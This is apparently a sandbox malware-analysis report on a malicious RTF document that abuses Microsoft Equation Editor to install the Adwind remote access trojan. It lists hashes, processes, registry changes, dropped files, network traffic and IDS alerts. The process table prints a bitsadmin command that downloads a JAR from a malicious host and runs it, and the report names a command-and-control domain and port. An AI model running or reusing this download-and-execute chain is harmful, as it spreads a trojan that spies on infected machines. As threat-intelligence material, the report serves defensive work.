File name: | BQZEMN.rtf |
Full analysis: | https://app.any.run/tasks/df5ea61c-d37f-4ccb-9047-ab538f120e0c |
Verdict: | Malicious activity |
Threats: | Adwind RAT, sometimes also called Unrecom, Sockrat, Frutas, jRat, and JSocket, is a Malware As A Service Remote Access Trojan that attackers can use to collect information from infected machines. It was one of the most popular RATs in the market in 2015. |
Analysis date: | February 18, 2019, 10:51:55 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, ANSI |
MD5: | FAE6C74C184AC3FFA7BEC8EA0C527567 |
SHA1: | 6F6A59FBB69774E310C4B0D5E2D41F6CF0C11AFA |
SHA256: | 0D01A9C923C6DE7882165195F8F451A574DE9FE209AC543B3E1E78ED515114BF |
SSDEEP: | 96:MO3c/Y/UG5VoWx2TeNMyRFVSB+EqykjfND8t0xm1y4hF/0Zr1N9KQ:MY/UGZxjDVSz+cQWZv0ZBN8Q |
.rtf | | | Rich Text Format (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2944 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\BQZEMN.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3212 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
3884 | cmd.exe /c bitsadmin /transfer 8 /download http://www.m8life.by/img/8/doc.jar %temp%\Io.Jar&%temp%\Io.Jar | C:\Windows\system32\cmd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2304 | bitsadmin /transfer 8 /download http://www.m8life.by/img/8/doc.jar C:\Users\admin\AppData\Local\Temp\Io.Jar | C:\Windows\system32\bitsadmin.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: BITS administration utility Exit code: 0 Version: 7.5.7600.16385 (win7_rtm.090713-1255) | ||||
3040 | "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\Io.Jar" | C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe | — | cmd.exe |
User: admin Company: Oracle Corporation Integrity Level: MEDIUM Description: Java(TM) Platform SE binary Exit code: 0 Version: 8.0.920.14 | ||||
2604 | "C:\Program Files\Java\jre1.8.0_92\bin\java.exe" -jar C:\Users\admin\AppData\Local\Temp\_0.42440904394910172865338082849278507.class | C:\Program Files\Java\jre1.8.0_92\bin\java.exe | javaw.exe | |
User: admin Company: Oracle Corporation Integrity Level: MEDIUM Description: Java(TM) Platform SE binary Version: 8.0.920.14 | ||||
2120 | cmd.exe /C cscript.exe C:\Users\admin\AppData\Local\Temp\Retrive8926773730017695811.vbs | C:\Windows\system32\cmd.exe | — | java.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2712 | cscript.exe C:\Users\admin\AppData\Local\Temp\Retrive8926773730017695811.vbs | C:\Windows\system32\cscript.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2512 | cmd.exe /C cscript.exe C:\Users\admin\AppData\Local\Temp\Retrive3778368214273123426.vbs | C:\Windows\system32\cmd.exe | — | java.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3132 | cscript.exe C:\Users\admin\AppData\Local\Temp\Retrive3778368214273123426.vbs | C:\Windows\system32\cscript.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Exit code: 0 Version: 5.8.7600.16385 |
(PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | fk, |
Value: 666B2C00800B0000010000000000000000000000 | |||
(PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1313996823 | |||
(PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1313996944 | |||
(PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1313996945 | |||
(PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: 800B0000A84A970078C7D40100000000 | |||
(PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | l, |
Value: 7F6C2C00800B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | l, |
Value: 7F6C2C00800B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE766.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2604 | java.exe | C:\Users\admin\AppData\Local\Temp\Retrive8926773730017695811.vbs | — | |
MD5:— | SHA256:— | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D512D016B6D8FC09C9D73080393CD633 | SHA256:E12CC561D707114629B3DAA016753E27BBF4954359B14694E71C0926457DABF5 | |||
2604 | java.exe | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp | text | |
MD5:D69A6AE627157E99E223C345F7A6B742 | SHA256:EB0565B43D783867CAE7A9E5E0B589C95C6AA61EDE933C5446D974D09C5B2043 | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$BQZEMN.rtf | pgc | |
MD5:D2AB2A903CF6A450A8AC8F255538C3E3 | SHA256:5181492AF9C4BDB0D12F4D9B06E78F45009812DB48FD940F8B9BA83456E665A3 | |||
3040 | javaw.exe | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp | text | |
MD5:5E00D07E8BA8965ADAB4A4BBC9DE0963 | SHA256:8C3B9BD1FCA473217E8E98E8DB870374FC490B6BF9EC7B406FE5D0B5688529C3 | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DCB71280.wmf | wmf | |
MD5:975B76E8E77D57CC386AF977A08B1E31 | SHA256:8D80E9B9B39CD00F3BFADB3B2538DC46845FE8D0E7854D5DD9C9C381150DEDAD | |||
3040 | javaw.exe | C:\Users\admin\AppData\Local\Temp\_0.42440904394910172865338082849278507.class | java | |
MD5:781FB531354D6F291F1CCAB48DA6D39F | SHA256:97D585B6AFF62FB4E43E7E6A5F816DCD7A14BE11A88B109A9BA9E8CD4C456EB9 | |||
2724 | xcopy.exe | C:\Users\admin\AppData\Roaming\Oracle\bin\deploy.dll | executable | |
MD5:720EDC1469525DFCD3AE211E653D0241 | SHA256:BFF79FB05667992CC2BDA9BAE6E5A301BAF553042F952203641CCD7E1FC4552D | |||
2724 | xcopy.exe | C:\Users\admin\AppData\Roaming\Oracle\README.txt | text | |
MD5:0F1123976B959AC5E8B89EB8C245C4BD | SHA256:963095CF8DB76FB8071FD19A3110718A42F2AB42B27A3ADFD9EC58981C3E88D2 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | HEAD | 200 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | — | — | malicious |
— | — | GET | 206 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | binary | 5.14 Kb | malicious |
— | — | GET | 206 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | binary | 5.13 Kb | malicious |
— | — | GET | 206 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | binary | 11.1 Kb | malicious |
— | — | GET | 206 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | binary | 23.1 Kb | malicious |
— | — | GET | 206 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | java | 4.51 Kb | malicious |
— | — | GET | 206 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | binary | 94.7 Kb | malicious |
— | — | GET | 206 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | binary | 46.9 Kb | malicious |
— | — | GET | 206 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | binary | 190 Kb | malicious |
— | — | GET | 206 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | binary | 255 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4068 | javaw.exe | 91.192.100.57:5656 | sukepatel101.ddns.net | SOFTplus Entwicklungen GmbH | CH | malicious |
— | — | 93.125.99.123:80 | www.m8life.by | Republican Unitary Telecommunication Enterprise Beltelecom | BY | malicious |
Domain | IP | Reputation |
---|---|---|
www.m8life.by |
| malicious |
sukepatel101.ddns.net |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO JAR Size Under 30K Size - Potentially Hostile |
4068 | javaw.exe | A Network Trojan was detected | ET TROJAN [PTsecurity] Fake SSL Certificate Observed (Oracle America) |
4068 | javaw.exe | A Network Trojan was detected | ET TROJAN [PTsecurity] Fake SSL Certificate Observed (Oracle America) |